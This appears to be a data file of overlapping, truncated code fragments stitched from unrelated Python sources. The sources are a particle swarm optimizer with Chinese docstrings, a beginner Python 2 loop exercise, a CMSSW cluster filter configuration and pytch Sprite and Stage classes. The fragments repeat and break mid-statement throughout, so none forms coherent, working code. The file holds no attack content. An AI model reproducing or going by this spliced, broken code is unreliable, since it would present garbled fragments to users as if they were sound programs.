isinstance(x_ub, list): x_ub = [x_ub] * dim if not isinstance(v_maxs, list): if", "dramkit.gentools import isnull from dramkit.optimizer.utils_heuristic import rand_init def pso(objf, func_opter_parms): ''' 粒子群优化算法(Particle Swarm", "= v_maxs[j] # if vel[i, j] < v_mins[j]: # vel[i, j] = v_mins[j]", "x_lb = func_opter_parms.parms_func['x_lb'] x_ub = func_opter_parms.parms_func['x_ub'] dim = func_opter_parms.parms_func['dim'] kwargs = func_opter_parms.parms_func['kwargs'] #", "j] < v_mins[j]: # vel[i, j] = v_mins[j] # # 位置更新 # pos[i,", "< w_fix < 1: raise ValueError('固定惯性因子w范围应该在(0, 1)内!') w = w_fix # # 速度和位置更新", "objf.__name__, 'x_lb': -10, 'x_ub': 10, 'dim': 10, 'kwargs': {}} parms_opter = {'opter_name': 'pso-test',", ": FuncOpterInfo :class:`dramkit.optimizer.utils_heuristic.FuncOpterInfo` 类, 须设置parms_func、parms_opter、parms_log | parms_func为目标函数参数信息dict,key须包含: | x_lb: 自变量每个维度取值下界,list或数值,为list时长度应等于dim | x_ub: 自变量每个维度取值上界,list或数值,为list时长度应等于dim" ]
[ "to the list\" elements.append(i) for i in elements: print \"Element was : %d\"", "['apple','orange','pear','apricot'] change = [1,'pennies',2,'dimes',3,'quarters'] for num in the_count: print \"This is count %d\"", "of type: %s\" % i for i in change: print \"I got %r\"", "for i in range(0, 6): print \"Adding \", i, j, \" to the", "= ['apple','orange','pear','apricot'] change = [1,'pennies',2,'dimes',3,'quarters'] for num in the_count: print \"This is count", "= [] j = \"5\" for i in range(0, 6): print \"Adding \",", "is count %d\" % num for i in fruits: print \"A fruit of", "for i in fruits: print \"A fruit of type: %s\" % i for", "print \"I got %r\" % i elements = [] j = \"5\" for", "\"I got %r\" % i elements = [] j = \"5\" for i", "%r\" % i elements = [] j = \"5\" for i in range(0,", "num in the_count: print \"This is count %d\" % num for i in", "\"5\" for i in range(0, 6): print \"Adding \", i, j, \" to", "[1,2,3,4,5] fruits = ['apple','orange','pear','apricot'] change = [1,'pennies',2,'dimes',3,'quarters'] for num in the_count: print \"This", "num for i in fruits: print \"A fruit of type: %s\" % i", "\", i, j, \" to the list\" elements.append(i) for i in elements: print", "elements = [] j = \"5\" for i in range(0, 6): print \"Adding", "i in fruits: print \"A fruit of type: %s\" % i for i", "for num in the_count: print \"This is count %d\" % num for i", "= [1,'pennies',2,'dimes',3,'quarters'] for num in the_count: print \"This is count %d\" % num", "fruits = ['apple','orange','pear','apricot'] change = [1,'pennies',2,'dimes',3,'quarters'] for num in the_count: print \"This is", "print \"This is count %d\" % num for i in fruits: print \"A", "for i in change: print \"I got %r\" % i elements = []", "print \"Adding \", i, j, \" to the list\" elements.append(i) for i in", "%d\" % num for i in fruits: print \"A fruit of type: %s\"", "[1,'pennies',2,'dimes',3,'quarters'] for num in the_count: print \"This is count %d\" % num for", "6): print \"Adding \", i, j, \" to the list\" elements.append(i) for i", "i in range(0, 6): print \"Adding \", i, j, \" to the list\"", "count %d\" % num for i in fruits: print \"A fruit of type:", "= [1,2,3,4,5] fruits = ['apple','orange','pear','apricot'] change = [1,'pennies',2,'dimes',3,'quarters'] for num in the_count: print", "\"This is count %d\" % num for i in fruits: print \"A fruit", "% num for i in fruits: print \"A fruit of type: %s\" %", "type: %s\" % i for i in change: print \"I got %r\" %", "the_count = [1,2,3,4,5] fruits = ['apple','orange','pear','apricot'] change = [1,'pennies',2,'dimes',3,'quarters'] for num in the_count:", "[] j = \"5\" for i in range(0, 6): print \"Adding \", i,", "\"A fruit of type: %s\" % i for i in change: print \"I", "j = \"5\" for i in range(0, 6): print \"Adding \", i, j,", "j, \" to the list\" elements.append(i) for i in elements: print \"Element was", "list\" elements.append(i) for i in elements: print \"Element was : %d\" % i", "i for i in change: print \"I got %r\" % i elements =", "got %r\" % i elements = [] j = \"5\" for i in", "in fruits: print \"A fruit of type: %s\" % i for i in", "<gh_stars>0 the_count = [1,2,3,4,5] fruits = ['apple','orange','pear','apricot'] change = [1,'pennies',2,'dimes',3,'quarters'] for num in", "%s\" % i for i in change: print \"I got %r\" % i", "change: print \"I got %r\" % i elements = [] j = \"5\"", "fruit of type: %s\" % i for i in change: print \"I got", "in change: print \"I got %r\" % i elements = [] j =", "% i elements = [] j = \"5\" for i in range(0, 6):", "i in change: print \"I got %r\" % i elements = [] j", "\" to the list\" elements.append(i) for i in elements: print \"Element was :", "= \"5\" for i in range(0, 6): print \"Adding \", i, j, \"", "\"Adding \", i, j, \" to the list\" elements.append(i) for i in elements:", "the list\" elements.append(i) for i in elements: print \"Element was : %d\" %", "i elements = [] j = \"5\" for i in range(0, 6): print", "i, j, \" to the list\" elements.append(i) for i in elements: print \"Element", "change = [1,'pennies',2,'dimes',3,'quarters'] for num in the_count: print \"This is count %d\" %", "fruits: print \"A fruit of type: %s\" % i for i in change:", "range(0, 6): print \"Adding \", i, j, \" to the list\" elements.append(i) for", "the_count: print \"This is count %d\" % num for i in fruits: print", "in the_count: print \"This is count %d\" % num for i in fruits:", "print \"A fruit of type: %s\" % i for i in change: print", "% i for i in change: print \"I got %r\" % i elements", "in range(0, 6): print \"Adding \", i, j, \" to the list\" elements.append(i)" ]
[ "<gh_stars>100-1000 import FWCore.ParameterSet.Config as cms tifClusterFilter = cms.EDFilter(\"ClusterMultiplicityFilter\", MaxNumberOfClusters = cms.uint32(300), ClusterCollection =", "import FWCore.ParameterSet.Config as cms tifClusterFilter = cms.EDFilter(\"ClusterMultiplicityFilter\", MaxNumberOfClusters = cms.uint32(300), ClusterCollection = cms.InputTag('siStripClusters')", "FWCore.ParameterSet.Config as cms tifClusterFilter = cms.EDFilter(\"ClusterMultiplicityFilter\", MaxNumberOfClusters = cms.uint32(300), ClusterCollection = cms.InputTag('siStripClusters') )" ]
[ "self.go_to_xy(x, y) wait_seconds(0) # No auto-yield (we don't do \"import pytch\") def set_size(self,", "Stage') self._appearance_index = 0 @classmethod def the_only(cls): return registered_instances(cls)[0] def switch_backdrop(self, backdrop_name): self.switch_appearance(backdrop_name)", "= (\"say\", content) def say_nothing(self): self._speech = None def say_for_seconds(self, content, seconds): self.say(content)", "return self.appearance_number @property def costume_name(self): return self.appearance_name def touching(self, target_class): return (self._pytch_parent_project .instance_is_touching_any_of(self,", "= 0 @classmethod def the_only(cls): return registered_instances(cls)[0] def switch_backdrop(self, backdrop_name): self.switch_appearance(backdrop_name) def next_backdrop(self,", ".format(self._appearance_hyponym, appearance_index, self.__class__.__name__)) n_appearances = len(self._appearance_names) if appearance_index >= n_appearances: raise ValueError( ('could", "in range(1, n_frames + 1): t = frame_idx / n_frames # t is", "None _appearance_hyponym = 'Backdrop' def __init__(self): if not self.Backdrops: # In contrast to", "('question-mark', 'question-mark.png', 16, 16), ] _appearance_hyponym = 'Costume' def __init__(self): self._x = 0", "x): self._x = x def change_x(self, dx): self._x += dx def get_y(self): return", "ValueError(\"n_steps must be integer\") if len(self._Appearances) == 0: raise ValueError( ('could not move", "None def say_for_seconds(self, content, seconds): self.say(content) wait_seconds(seconds) self.say_nothing() class Stage(Actor): Backdrops = [('solid-white',", "int) or isinstance(x, float) class Actor: Sounds = [] _appearance_names = None def", "necessarily an error to have no Costumes, as # long as the Sprite", "ValueError( ('could not switch {} in class \"{}\":' ' argument must be string", "_y = 0 _size = 1.0 _shown = True _speech = None _appearance_hyponym", "class Stage(Actor): Backdrops = [('solid-white', 'solid-white-stage.png')] _x = 0 _y = 0 _size", "@property def costume_number(self): return self.appearance_number @property def costume_name(self): return self.appearance_name def touching(self, target_class):", "self._appearance_names[self._appearance_index] class Sprite(Actor): Costumes = [ ('question-mark', 'question-mark.png', 16, 16), ] _appearance_hyponym =", "y = t * destination_y + t_c * start_y self.go_to_xy(x, y) wait_seconds(0) #", "_is_number(seconds): raise ValueError(\"'seconds' must be a number\"); if seconds < 0: raise ValueError(\"'seconds'", "len(self._Appearances) == 0: raise ValueError( ('could not move to next {} in class", "* FRAMES_PER_SECOND), 1) start_x = self._x start_y = self._y # On completion, we", "0 _size = 1.0 _shown = True _speech = None _appearance_hyponym = 'Backdrop'", "if seconds < 0: raise ValueError(\"'seconds' cannot be negative\") n_frames = max(int(seconds *", "0: raise ValueError( ('could not move to next {} in class \"{}\":' '", "( play_sound, registered_instances, wait_seconds, ) from pytch.project import FRAMES_PER_SECOND def _is_number(x): return isinstance(x,", "as # long as the Sprite always remains hidden. It might, for #", "must be string or integer') .format(self._appearance_hyponym, self.__class__.__name__)) def next_appearance(self, n_steps): if not isinstance(n_steps,", "t_c * start_x y = t * destination_y + t_c * start_y self.go_to_xy(x,", "Backdrops in Stage') self._appearance_index = 0 @classmethod def the_only(cls): return registered_instances(cls)[0] def switch_backdrop(self,", ") if not destination_is_number: raise ValueError(\"destination coordinates must be numbers\") if not _is_number(seconds):", "is always shown and so # must have at least one Backdrop. raise", "at the target, and we want # the first frame to involve some", "t # 'complement' x = t * destination_x + t_c * start_x y", "it has no {0}s') .format(self._appearance_hyponym, self.__class__.__name__) ) self._appearance_index += n_steps self._appearance_index %= len(self._Appearances)", "x def change_x(self, dx): self._x += dx def get_y(self): return self._y def set_y(self,", "Sprites, a Stage is always shown and so # must have at least", "0 _y = 0 _size = 1.0 _shown = True _speech = None", "class \"{}\":' ' it only has {} {0}s') .format(self._appearance_hyponym, appearance_index, self.__class__.__name__, n_appearances)) self._appearance_index", "Sprite with no Costumes') self._shown = True def hide(self): self._shown = False def", "in Stage') self._appearance_index = 0 @classmethod def the_only(cls): return registered_instances(cls)[0] def switch_backdrop(self, backdrop_name):", "rather than 0 up to n_frames - 1. for frame_idx in range(1, n_frames", "self._y = 0 self._size = 1.0 self._speech = None at_least_one_Costume = len(self._Appearances) !=", "class \"{}\":' ' argument must be string or integer') .format(self._appearance_hyponym, self.__class__.__name__)) def next_appearance(self,", "= 'Costume' def __init__(self): self._x = 0 self._y = 0 self._size = 1.0", "there are no Costumes\") self._shown = self.start_shown else: self._shown = at_least_one_Costume if at_least_one_Costume:", "len(self._Appearances) != 0 if hasattr(self, \"start_shown\"): if self.start_shown and not at_least_one_Costume: raise ValueError(\"start_shown", "_shown = True _speech = None _appearance_hyponym = 'Backdrop' def __init__(self): if not", "self._appearance_index = 0 else: # It is not necessarily an error to have", ".format(self._appearance_hyponym, appearance_name, self.__class__.__name__)) self._appearance_index = self._appearance_names.index(appearance_name) elif isinstance(appearance_name_or_index, int): appearance_index = appearance_name_or_index if", "'complement' x = t * destination_x + t_c * start_x y = t", "@classmethod def the_only(cls): return registered_instances(cls)[0] def switch_backdrop(self, backdrop_name): self.switch_appearance(backdrop_name) def next_backdrop(self, n_steps=1): self.next_appearance(n_steps)", "def set_x(self, x): self._x = x def change_x(self, dx): self._x += dx def", "True def hide(self): self._shown = False def switch_costume(self, costume_name): self.switch_appearance(costume_name) def next_costume(self, n_steps=1):", "\"{}\":' ' it only has {} {0}s') .format(self._appearance_hyponym, appearance_index, self.__class__.__name__, n_appearances)) self._appearance_index =", "def show(self): if not self.Costumes: # See comment in __init__(). raise RuntimeError('cannot show", "(self._pytch_parent_project .move_within_draw_layer_group(self, \"relative\", -n_layers)) def say(self, content): self._speech = (\"say\", content) def say_nothing(self):", "move_to_back_layer(self): (self._pytch_parent_project .move_within_draw_layer_group(self, \"absolute\", 0)) def move_forward_layers(self, n_layers): (self._pytch_parent_project .move_within_draw_layer_group(self, \"relative\", n_layers)) def", "can not be negative') .format(self._appearance_hyponym, appearance_index, self.__class__.__name__)) n_appearances = len(self._appearance_names) if appearance_index >=", "up # to n_frames (inclusive) rather than 0 up to n_frames - 1.", "# must have at least one Backdrop. raise ValueError('no Backdrops in Stage') self._appearance_index", "to next {} in class \"{}\":' ' it has no {0}s') .format(self._appearance_hyponym, self.__class__.__name__)", "' argument must be string or integer') .format(self._appearance_hyponym, self.__class__.__name__)) def next_appearance(self, n_steps): if", "0 up to n_frames - 1. for frame_idx in range(1, n_frames + 1):", "not in self._appearance_names: raise KeyError('could not find {} \"{}\" in class \"{}\"' .format(self._appearance_hyponym,", "# On completion, we must be exactly at the target, and we want", "appearance_name = appearance_name_or_index if appearance_name not in self._appearance_names: raise KeyError('could not find {}", "from pytch.project import FRAMES_PER_SECOND def _is_number(x): return isinstance(x, int) or isinstance(x, float) class", "None at_least_one_Costume = len(self._Appearances) != 0 if hasattr(self, \"start_shown\"): if self.start_shown and not", "self._x start_y = self._y # On completion, we must be exactly at the", "self._x = 0 self._y = 0 self._size = 1.0 self._speech = None at_least_one_Costume", "_appearance_hyponym = 'Backdrop' def __init__(self): if not self.Backdrops: # In contrast to Sprites,", "import FRAMES_PER_SECOND def _is_number(x): return isinstance(x, int) or isinstance(x, float) class Actor: Sounds", ") from pytch.project import FRAMES_PER_SECOND def _is_number(x): return isinstance(x, int) or isinstance(x, float)", "contrast to Sprites, a Stage is always shown and so # must have", "play_sound(self, sound_name, False) def play_sound_until_done(self, sound_name): play_sound(self, sound_name, True) @classmethod def ensure_have_appearance_names(cls): if", "self.Costumes: # See comment in __init__(). raise RuntimeError('cannot show a Sprite with no", "def _is_number(x): return isinstance(x, int) or isinstance(x, float) class Actor: Sounds = []", "def the_original(cls): return registered_instances(cls)[0] @classmethod def all_clones(cls): return registered_instances(cls)[1:] @classmethod def all_instances(cls): return", "= [('solid-white', 'solid-white-stage.png')] _x = 0 _y = 0 _size = 1.0 _shown", "isinstance(appearance_name_or_index, str): appearance_name = appearance_name_or_index if appearance_name not in self._appearance_names: raise KeyError('could not", "for # example, only receive/broadcast messages or play sounds. self._appearance_index = None @classmethod", "has {} {0}s') .format(self._appearance_hyponym, appearance_index, self.__class__.__name__, n_appearances)) self._appearance_index = appearance_index else: raise ValueError(", "some movement, so count from 1 up # to n_frames (inclusive) rather than", "sound_name): play_sound(self, sound_name, True) @classmethod def ensure_have_appearance_names(cls): if cls._appearance_names is None: cls._appearance_names =", "and not at_least_one_Costume: raise ValueError(\"start_shown is set,\" \" but there are no Costumes\")", "a Stage is always shown and so # must have at least one", "'solid-white-stage.png')] _x = 0 _y = 0 _size = 1.0 _shown = True", "move to next {} in class \"{}\":' ' it has no {0}s') .format(self._appearance_hyponym,", "number {} in class \"{}\":' ' it only has {} {0}s') .format(self._appearance_hyponym, appearance_index,", "0: raise ValueError(\"'seconds' cannot be negative\") n_frames = max(int(seconds * FRAMES_PER_SECOND), 1) start_x", "to {} number {} in class \"{}\":' ' number can not be negative')", "float) class Actor: Sounds = [] _appearance_names = None def start_sound(self, sound_name): play_sound(self,", "def change_x(self, dx): self._x += dx def get_y(self): return self._y def set_y(self, y):", "'Costume' def __init__(self): self._x = 0 self._y = 0 self._size = 1.0 self._speech", "# It is not necessarily an error to have no Costumes, as #", "Costumes, as # long as the Sprite always remains hidden. It might, for", "not switch {} in class \"{}\":' ' argument must be string or integer')", "= y def change_y(self, dy): self._y += dy def glide_to_xy(self, destination_x, destination_y, seconds):", ".instance_is_touching_any_of(self, target_class)) def delete_this_clone(self): self._pytch_parent_project.unregister_actor_instance(self) def move_to_front_layer(self): (self._pytch_parent_project .move_within_draw_layer_group(self, \"absolute\", -1)) def move_to_back_layer(self):", "in class \"{}\":' ' it only has {} {0}s') .format(self._appearance_hyponym, appearance_index, self.__class__.__name__, n_appearances))", "return registered_instances(cls)[0] @classmethod def all_clones(cls): return registered_instances(cls)[1:] @classmethod def all_instances(cls): return registered_instances(cls) def", "in class \"{}\"' .format(self._appearance_hyponym, appearance_name, self.__class__.__name__)) self._appearance_index = self._appearance_names.index(appearance_name) elif isinstance(appearance_name_or_index, int): appearance_index", "# t is in (0.0, 1.0] t_c = 1.0 - t # 'complement'", "def get_x(self): return self._x def set_x(self, x): self._x = x def change_x(self, dx):", "= 1.0 - t # 'complement' x = t * destination_x + t_c", "{} in class \"{}\":' ' number can not be negative') .format(self._appearance_hyponym, appearance_index, self.__class__.__name__))", "but there are no Costumes\") self._shown = self.start_shown else: self._shown = at_least_one_Costume if", "n_appearances: raise ValueError( ('could not switch to {} number {} in class \"{}\":'", "{} in class \"{}\":' ' it has no {0}s') .format(self._appearance_hyponym, self.__class__.__name__) ) self._appearance_index", "self._appearance_index %= len(self._Appearances) @property def appearance_number(self): return self._appearance_index @property def appearance_name(self): self.ensure_have_appearance_names() return", "self._speech = None at_least_one_Costume = len(self._Appearances) != 0 if hasattr(self, \"start_shown\"): if self.start_shown", "registered_instances, wait_seconds, ) from pytch.project import FRAMES_PER_SECOND def _is_number(x): return isinstance(x, int) or", "Sprite always remains hidden. It might, for # example, only receive/broadcast messages or", "raise KeyError('could not find {} \"{}\" in class \"{}\"' .format(self._appearance_hyponym, appearance_name, self.__class__.__name__)) self._appearance_index", "in class \"{}\":' ' number can not be negative') .format(self._appearance_hyponym, appearance_index, self.__class__.__name__)) n_appearances", "# No auto-yield (we don't do \"import pytch\") def set_size(self, size): self._size =", "raise ValueError(\"'seconds' cannot be negative\") n_frames = max(int(seconds * FRAMES_PER_SECOND), 1) start_x =", "@classmethod def all_instances(cls): return registered_instances(cls) def go_to_xy(self, x, y): self._x = x self._y", "cannot be negative\") n_frames = max(int(seconds * FRAMES_PER_SECOND), 1) start_x = self._x start_y", "say_nothing(self): self._speech = None def say_for_seconds(self, content, seconds): self.say(content) wait_seconds(seconds) self.say_nothing() class Stage(Actor):", "sound_name, False) def play_sound_until_done(self, sound_name): play_sound(self, sound_name, True) @classmethod def ensure_have_appearance_names(cls): if cls._appearance_names", "def switch_costume(self, costume_name): self.switch_appearance(costume_name) def next_costume(self, n_steps=1): self.next_appearance(n_steps) @property def costume_number(self): return self.appearance_number", "no Costumes\") self._shown = self.start_shown else: self._shown = at_least_one_Costume if at_least_one_Costume: self._appearance_index =", "Costumes\") self._shown = self.start_shown else: self._shown = at_least_one_Costume if at_least_one_Costume: self._appearance_index = 0", "\"absolute\", -1)) def move_to_back_layer(self): (self._pytch_parent_project .move_within_draw_layer_group(self, \"absolute\", 0)) def move_forward_layers(self, n_layers): (self._pytch_parent_project .move_within_draw_layer_group(self,", "def the_only(cls): return registered_instances(cls)[0] def switch_backdrop(self, backdrop_name): self.switch_appearance(backdrop_name) def next_backdrop(self, n_steps=1): self.next_appearance(n_steps) @property", "be negative') .format(self._appearance_hyponym, appearance_index, self.__class__.__name__)) n_appearances = len(self._appearance_names) if appearance_index >= n_appearances: raise", "= len(self._appearance_names) if appearance_index >= n_appearances: raise ValueError( ('could not switch to {}", "costume_number(self): return self.appearance_number @property def costume_name(self): return self.appearance_name def touching(self, target_class): return (self._pytch_parent_project", "content) def say_nothing(self): self._speech = None def say_for_seconds(self, content, seconds): self.say(content) wait_seconds(seconds) self.say_nothing()", "the first frame to involve some movement, so count from 1 up #", "_appearance_hyponym = 'Costume' def __init__(self): self._x = 0 self._y = 0 self._size =", "self._y # On completion, we must be exactly at the target, and we", "# example, only receive/broadcast messages or play sounds. self._appearance_index = None @classmethod def", "def hide(self): self._shown = False def switch_costume(self, costume_name): self.switch_appearance(costume_name) def next_costume(self, n_steps=1): self.next_appearance(n_steps)", "than 0 up to n_frames - 1. for frame_idx in range(1, n_frames +", "1): t = frame_idx / n_frames # t is in (0.0, 1.0] t_c", "< 0: raise ValueError(\"'seconds' cannot be negative\") n_frames = max(int(seconds * FRAMES_PER_SECOND), 1)", "self._appearance_index = None @classmethod def the_original(cls): return registered_instances(cls)[0] @classmethod def all_clones(cls): return registered_instances(cls)[1:]", "set_size(self, size): self._size = size def show(self): if not self.Costumes: # See comment", "isinstance(n_steps, int): raise ValueError(\"n_steps must be integer\") if len(self._Appearances) == 0: raise ValueError(", "No auto-yield (we don't do \"import pytch\") def set_size(self, size): self._size = size", "ValueError( ('could not switch to {} number {} in class \"{}\":' ' number", "{} in class \"{}\":' ' argument must be string or integer') .format(self._appearance_hyponym, self.__class__.__name__))", "not find {} \"{}\" in class \"{}\"' .format(self._appearance_hyponym, appearance_name, self.__class__.__name__)) self._appearance_index = self._appearance_names.index(appearance_name)", "change_x(self, dx): self._x += dx def get_y(self): return self._y def set_y(self, y): self._y", "always remains hidden. It might, for # example, only receive/broadcast messages or play", "set_y(self, y): self._y = y def change_y(self, dy): self._y += dy def glide_to_xy(self,", ".format(self._appearance_hyponym, self.__class__.__name__)) def next_appearance(self, n_steps): if not isinstance(n_steps, int): raise ValueError(\"n_steps must be", "_is_number(destination_x) and _is_number(destination_y) ) if not destination_is_number: raise ValueError(\"destination coordinates must be numbers\")", "appearance_index = appearance_name_or_index if appearance_index < 0: raise ValueError( ('could not switch to", "self._y = y def get_x(self): return self._x def set_x(self, x): self._x = x", "{} \"{}\" in class \"{}\"' .format(self._appearance_hyponym, appearance_name, self.__class__.__name__)) self._appearance_index = self._appearance_names.index(appearance_name) elif isinstance(appearance_name_or_index,", "be exactly at the target, and we want # the first frame to", "# 'complement' x = t * destination_x + t_c * start_x y =", "next_appearance(self, n_steps): if not isinstance(n_steps, int): raise ValueError(\"n_steps must be integer\") if len(self._Appearances)", "not destination_is_number: raise ValueError(\"destination coordinates must be numbers\") if not _is_number(seconds): raise ValueError(\"'seconds'", "len(self._Appearances) @property def appearance_number(self): return self._appearance_index @property def appearance_name(self): self.ensure_have_appearance_names() return self._appearance_names[self._appearance_index] class", "to have no Costumes, as # long as the Sprite always remains hidden.", "__init__(self): self._x = 0 self._y = 0 self._size = 1.0 self._speech = None", "True) @classmethod def ensure_have_appearance_names(cls): if cls._appearance_names is None: cls._appearance_names = [ appearance.label for", "be negative\") n_frames = max(int(seconds * FRAMES_PER_SECOND), 1) start_x = self._x start_y =", "a number\"); if seconds < 0: raise ValueError(\"'seconds' cannot be negative\") n_frames =", "{0}s') .format(self._appearance_hyponym, appearance_index, self.__class__.__name__, n_appearances)) self._appearance_index = appearance_index else: raise ValueError( ('could not", "cls._appearance_names is None: cls._appearance_names = [ appearance.label for appearance in cls._Appearances ] def", "class \"{}\":' ' number can not be negative') .format(self._appearance_hyponym, appearance_index, self.__class__.__name__)) n_appearances =", "y) wait_seconds(0) # No auto-yield (we don't do \"import pytch\") def set_size(self, size):", "or isinstance(x, float) class Actor: Sounds = [] _appearance_names = None def start_sound(self,", "* destination_x + t_c * start_x y = t * destination_y + t_c", "from 1 up # to n_frames (inclusive) rather than 0 up to n_frames", "one Backdrop. raise ValueError('no Backdrops in Stage') self._appearance_index = 0 @classmethod def the_only(cls):", "- 1. for frame_idx in range(1, n_frames + 1): t = frame_idx /", "switch {} in class \"{}\":' ' argument must be string or integer') .format(self._appearance_hyponym,", "self.say(content) wait_seconds(seconds) self.say_nothing() class Stage(Actor): Backdrops = [('solid-white', 'solid-white-stage.png')] _x = 0 _y", "raise ValueError(\"n_steps must be integer\") if len(self._Appearances) == 0: raise ValueError( ('could not", "pytch.project import FRAMES_PER_SECOND def _is_number(x): return isinstance(x, int) or isinstance(x, float) class Actor:", "appearance_index < 0: raise ValueError( ('could not switch to {} number {} in", "@property def appearance_number(self): return self._appearance_index @property def appearance_name(self): self.ensure_have_appearance_names() return self._appearance_names[self._appearance_index] class Sprite(Actor):", "next {} in class \"{}\":' ' it has no {0}s') .format(self._appearance_hyponym, self.__class__.__name__) )", "if not self.Costumes: # See comment in __init__(). raise RuntimeError('cannot show a Sprite", "def move_to_front_layer(self): (self._pytch_parent_project .move_within_draw_layer_group(self, \"absolute\", -1)) def move_to_back_layer(self): (self._pytch_parent_project .move_within_draw_layer_group(self, \"absolute\", 0)) def", "def move_forward_layers(self, n_layers): (self._pytch_parent_project .move_within_draw_layer_group(self, \"relative\", n_layers)) def move_backward_layers(self, n_layers): (self._pytch_parent_project .move_within_draw_layer_group(self, \"relative\",", "backdrop_name): self.switch_appearance(backdrop_name) def next_backdrop(self, n_steps=1): self.next_appearance(n_steps) @property def backdrop_number(self): return self.appearance_number @property def", "@classmethod def ensure_have_appearance_names(cls): if cls._appearance_names is None: cls._appearance_names = [ appearance.label for appearance", "= self._y # On completion, we must be exactly at the target, and", "def switch_appearance(self, appearance_name_or_index): self.ensure_have_appearance_names() if isinstance(appearance_name_or_index, str): appearance_name = appearance_name_or_index if appearance_name not", "None: cls._appearance_names = [ appearance.label for appearance in cls._Appearances ] def switch_appearance(self, appearance_name_or_index):", "[ ('question-mark', 'question-mark.png', 16, 16), ] _appearance_hyponym = 'Costume' def __init__(self): self._x =", "%= len(self._Appearances) @property def appearance_number(self): return self._appearance_index @property def appearance_name(self): self.ensure_have_appearance_names() return self._appearance_names[self._appearance_index]", "Stage is always shown and so # must have at least one Backdrop.", "<gh_stars>0 from pytch.syscalls import ( play_sound, registered_instances, wait_seconds, ) from pytch.project import FRAMES_PER_SECOND", "' it has no {0}s') .format(self._appearance_hyponym, self.__class__.__name__) ) self._appearance_index += n_steps self._appearance_index %=", "# to n_frames (inclusive) rather than 0 up to n_frames - 1. for", "raise RuntimeError('cannot show a Sprite with no Costumes') self._shown = True def hide(self):", "not switch to {} number {} in class \"{}\":' ' number can not", "pytch\") def set_size(self, size): self._size = size def show(self): if not self.Costumes: #", "# long as the Sprite always remains hidden. It might, for # example,", "content): self._speech = (\"say\", content) def say_nothing(self): self._speech = None def say_for_seconds(self, content,", "registered_instances(cls)[0] @classmethod def all_clones(cls): return registered_instances(cls)[1:] @classmethod def all_instances(cls): return registered_instances(cls) def go_to_xy(self,", "glide_to_xy(self, destination_x, destination_y, seconds): destination_is_number = ( _is_number(destination_x) and _is_number(destination_y) ) if not", "must be exactly at the target, and we want # the first frame", "start_y self.go_to_xy(x, y) wait_seconds(0) # No auto-yield (we don't do \"import pytch\") def", "See comment in __init__(). raise RuntimeError('cannot show a Sprite with no Costumes') self._shown", "t is in (0.0, 1.0] t_c = 1.0 - t # 'complement' x", "1. for frame_idx in range(1, n_frames + 1): t = frame_idx / n_frames", "to Sprites, a Stage is always shown and so # must have at", "y def get_x(self): return self._x def set_x(self, x): self._x = x def change_x(self,", "long as the Sprite always remains hidden. It might, for # example, only", "we must be exactly at the target, and we want # the first", "\"{}\":' ' it has no {0}s') .format(self._appearance_hyponym, self.__class__.__name__) ) self._appearance_index += n_steps self._appearance_index", "y): self._y = y def change_y(self, dy): self._y += dy def glide_to_xy(self, destination_x,", "self._y def set_y(self, y): self._y = y def change_y(self, dy): self._y += dy", "target_class)) def delete_this_clone(self): self._pytch_parent_project.unregister_actor_instance(self) def move_to_front_layer(self): (self._pytch_parent_project .move_within_draw_layer_group(self, \"absolute\", -1)) def move_to_back_layer(self): (self._pytch_parent_project", "numbers\") if not _is_number(seconds): raise ValueError(\"'seconds' must be a number\"); if seconds <", "= ( _is_number(destination_x) and _is_number(destination_y) ) if not destination_is_number: raise ValueError(\"destination coordinates must", "return self.appearance_name def touching(self, target_class): return (self._pytch_parent_project .instance_is_touching_any_of(self, target_class)) def delete_this_clone(self): self._pytch_parent_project.unregister_actor_instance(self) def", "= 1.0 _shown = True _speech = None _appearance_hyponym = 'Backdrop' def __init__(self):", "\"{}\"' .format(self._appearance_hyponym, appearance_name, self.__class__.__name__)) self._appearance_index = self._appearance_names.index(appearance_name) elif isinstance(appearance_name_or_index, int): appearance_index = appearance_name_or_index", "error to have no Costumes, as # long as the Sprite always remains", "= True _speech = None _appearance_hyponym = 'Backdrop' def __init__(self): if not self.Backdrops:", "= size def show(self): if not self.Costumes: # See comment in __init__(). raise", "at least one Backdrop. raise ValueError('no Backdrops in Stage') self._appearance_index = 0 @classmethod", "n_steps=1): self.next_appearance(n_steps) @property def costume_number(self): return self.appearance_number @property def costume_name(self): return self.appearance_name def", "say_for_seconds(self, content, seconds): self.say(content) wait_seconds(seconds) self.say_nothing() class Stage(Actor): Backdrops = [('solid-white', 'solid-white-stage.png')] _x", "' it only has {} {0}s') .format(self._appearance_hyponym, appearance_index, self.__class__.__name__, n_appearances)) self._appearance_index = appearance_index", "_speech = None _appearance_hyponym = 'Backdrop' def __init__(self): if not self.Backdrops: # In", "if self.start_shown and not at_least_one_Costume: raise ValueError(\"start_shown is set,\" \" but there are", "if at_least_one_Costume: self._appearance_index = 0 else: # It is not necessarily an error", "t_c = 1.0 - t # 'complement' x = t * destination_x +", "move_backward_layers(self, n_layers): (self._pytch_parent_project .move_within_draw_layer_group(self, \"relative\", -n_layers)) def say(self, content): self._speech = (\"say\", content)", "return registered_instances(cls) def go_to_xy(self, x, y): self._x = x self._y = y def", "1.0] t_c = 1.0 - t # 'complement' x = t * destination_x", "= at_least_one_Costume if at_least_one_Costume: self._appearance_index = 0 else: # It is not necessarily", "frame to involve some movement, so count from 1 up # to n_frames", "appearance_name_or_index): self.ensure_have_appearance_names() if isinstance(appearance_name_or_index, str): appearance_name = appearance_name_or_index if appearance_name not in self._appearance_names:", "t = frame_idx / n_frames # t is in (0.0, 1.0] t_c =", "self._appearance_index = self._appearance_names.index(appearance_name) elif isinstance(appearance_name_or_index, int): appearance_index = appearance_name_or_index if appearance_index < 0:", "raise ValueError(\"'seconds' must be a number\"); if seconds < 0: raise ValueError(\"'seconds' cannot", "if cls._appearance_names is None: cls._appearance_names = [ appearance.label for appearance in cls._Appearances ]", "= 0 else: # It is not necessarily an error to have no", "only has {} {0}s') .format(self._appearance_hyponym, appearance_index, self.__class__.__name__, n_appearances)) self._appearance_index = appearance_index else: raise", "if appearance_index < 0: raise ValueError( ('could not switch to {} number {}", "raise ValueError(\"destination coordinates must be numbers\") if not _is_number(seconds): raise ValueError(\"'seconds' must be", "= max(int(seconds * FRAMES_PER_SECOND), 1) start_x = self._x start_y = self._y # On", "+= n_steps self._appearance_index %= len(self._Appearances) @property def appearance_number(self): return self._appearance_index @property def appearance_name(self):", "def delete_this_clone(self): self._pytch_parent_project.unregister_actor_instance(self) def move_to_front_layer(self): (self._pytch_parent_project .move_within_draw_layer_group(self, \"absolute\", -1)) def move_to_back_layer(self): 